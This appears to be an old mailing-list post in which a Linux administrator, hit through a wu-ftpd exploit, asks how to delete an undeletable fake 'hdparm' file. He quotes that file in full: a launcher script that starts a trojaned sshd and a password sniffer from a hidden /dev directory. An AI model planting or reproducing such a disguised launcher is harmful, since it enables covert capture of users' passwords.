Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0.
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidentally
found another one. The problem is I cannot rm it.
I use Linux 2.2.16 and bash.
I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin. Curious, I did 'which hdparm' and found it
was the one in /usr/sbin. So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer. I tried to move it. I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700. I tried
to rm it. Nothing. I get this message:
"Cannot unlink hdparm: Operation not permitted."
Can you tell me how to get rid of this offensive piece of
garbage? BTW, this is the contents of the file:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
I found that tcp.log contained plain text passwords of every user
on my system. Scary!
-Roy Wilson-
[EMAIL PROTECTED]